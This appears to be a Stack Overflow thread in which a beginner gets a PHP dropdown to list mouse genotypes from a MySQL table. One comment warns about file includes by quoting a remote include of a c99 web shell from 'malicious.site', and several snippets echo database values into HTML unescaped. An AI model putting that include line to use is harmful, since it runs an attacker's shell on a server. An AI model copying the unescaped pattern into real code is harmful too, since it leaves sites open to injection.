# PHP/MySQL Dropdown

Tags: php, html, mysql, sql

I'm just learning PHP/MySQL and have spent the last few days trying to get a drop-down menu to populate options from my database. I have read through several tutorials, and tried to apply them, but I cannot get this working.

**What I'm trying to do:**
I need a drop-down menu called "Genotype" that pulls a list of genotypes from the "Genotype" column of a table in my database named "Mice."

**Problem**: When I hit the submit button, it connects to my database and performs the query. BUT I cannot get any options to show up from the drop-down menu.

**Here's my code so far (Please let me know if I should post mousecount.php)**

```
<?php

include('connection.txt');

$conn = mysqli_connect($server, $user, $pass, $dbname, $port)
or die('Error connecting to MySQL server.');
?>

<html>  
<head><title>Crap That Won't Work</title></head>
<body bgcolor="white">

<hr>
<dt>THINGS ARE TOTALLY NOT WORKING</dt>
<dd>
<form action="mousecount.php" method="POST">
<table><tr>
<td><p><label for="Genotype">Genotype:</label><br/>
<select name="Genotype">
<?php
$query = "SELECT MouseID, Genotype FROM Mice";
$result = mysqli_query($conn, $query);
while($row = mysqli_fetch_array($result))
{
print "<option value=\"$row['Genotype']\">".$row['Genotype']."</option>";
}
?>
</select>
</p></td>
</tr></table><br/>
<input type="submit" value="Submit">
</form>
</body>
</html>
```

## Edit (solved):

I was having trouble getting the drop-down menu to populate with options from MySQL database. Thanks to your help. I'm posting my final code in case it will help anyone else.

```
<!-- Connect to database -->
<?php
include('connection.php');
$conn = mysqli_connect($server, $user, $pass, $dbname, $port)
or die (mysql_error());
?>

<hr>

<h4>Mice Count</h4>
<form action="mousecount.php" method="POST">
<p><label for="Genotype">By Genotype:</label><br/>
<?php
$query = "SELECT Genotype from Mice GROUP BY Genotype";
$result = mysqli_query($conn, $query);
echo "<select name='Genotype'>";
echo "<option value='0'>-Select-</option>";
while($row = mysqli_fetch_array($result)) {
    echo "<option value='".$row['Genotype']."'>".$row['Genotype']."</option>";
}
echo "</select>";
?>
</p>
<input type="submit" value="Submit">

</form>

</body>
</html>
```

Comment: AFAIK, the `E_NOT_WORKING` is not a common PHP error code.

Comment: @tereško It is very common on SO, but not useful :)

Comment: It is best to post your successful code as an edit rather than replacing your original question. Erasing your original code makes it difficult for other coders to determine the problem/solution.

Comment: The top code block is the not-working bit. The bottom is the solution.

Comment: Nice job - your solution works perfectly.  I had written nearly the exact same code for myself but couldn't get it working - some small syntactical error, I'm sure.

Comment: The bottom Edit (solved): is working fine.

Answer (score 0, accepted):

Please see [php.net manual](http://www.php.net/manual/en/class.mysqli-result.php) as I don't see a fetch method.

Comment: Thanks! I changed it to: while($row = mysqli_fetch_array($result)) now the funky code is gone from the drop-down, but it's still not pulling anything from my database.

Comment: $rows = mysqli_fetch_array($result);
foreach($rows AS $row) {
 print "<option value=\"$row['Genotype']\">".$row['Genotype']."</option>";
}

Comment: Thank you... it didn't work. The drop-down is still empty. Here's a link to the results if that's helpful:

http://ix.cs.uoregon.edu/~summere/index.html

Comment: First thing you have two closing braces } in that example and if you do a print_r on $rows do you get results.

Comment: Got it working after some additional tweaking, but you really got me jumpstarted. Thank you. I'll post my final code above in an edit.

Answer (score 0):

What is there in `connection.txt`?
If you have connection variables written on that, make it a php file instead of txt and then include it.

Comment: Whatever filename you pass to include will pass the interpreter. This has lead to c99 shell exploits a few years ago and resulted in default disabled URL include (`include('http://malicious.site/c99.shell.txt');`)

Comment: Thank you @srikanta mondal! The query now pulls results, but the drop-down menu is still not pulling options from the database.

Answer (score 0):

Connect to your database first

```
$con=mysqli_connect("localhost","username","password","dbname"); 
if (mysqli_connect_errno()) 
{ printf("Connect failed: %s\n", mysqli_connect_error());
 exit(); } 

$result = mysqli_query($con, "select MouseID, Genotype FROM Mice"); 
while ($row = mysqli_fetch_assoc($result)){ ?> 
<option value="<?php echo $row['Genotype']; ?>"><?php echo $row['Genotype']; ?></option>
```

Comment: Thanks! I have a variable: $conn = mysqli_connect($server, $user, $pass, $dbname, $port)
 or die('Error connecting to MySQL server.');
That points to the connection.php file with connection info. It connects properly, the drop-down just doesn't give me any options.

Answer (score 0):

now you can use this code...
first make the connection to data base.

```
<?php
$conn = mysqli_connect("localhost", "root", "") or die('Error connecting to MySQLserver.');
mysqli_select_db($conn, "demo") or die("Failed to connect to database");
?>
```

fetch the value to database & used in your dropdown menu.

```
<select name="country" class="country">
<option selected="selected">--Select Country--</option>
<?php 
$sql=mysqli_query($conn, "select * from countries order by id ASC");
while($row=mysqli_fetch_array($sql))
{
echo '<option value="'.$row['id'].'">'.$row['name'].'</option>';
} ?>
</select>
```

Answer (score -1):

first you require to add connection to your database with the help of this code.

```
<?php
$con = mysql_connect("localhost", "root", "") or die("Failed to connect to MySql.");
mysql_select_db("demo", $con) or die("Failed to connect to database");
?>
```

then this is your drop down menu, all values comes from database.

```
<select name="country" class="country">
<option selected="selected">--Select Country--</option>
<?php
$sql=mysql_query("select * from countries order by id ASC");
while($row=mysql_fetch_array($sql))
{
echo '<option value="'.$row['id'].'">'.$row['name'].'</option>';
} ?>
</select>
```

Comment: Thanks! I have a variable that I call from my $result variable: $conn = mysqli_connect($server, $user, $pass, $dbname, $port) or die('Error connecting to MySQL server.'); 

Then I call it with:
$result = mysqli_query($conn, $query);


And it then points to the connection.php file with connection info. It connects and when I hit the submit button it performs the query, but the drop-down just doesn't populate with any options.

Comment: why do you use deprecated and insecure mysql_query() ?

Comment: what's the value of $query??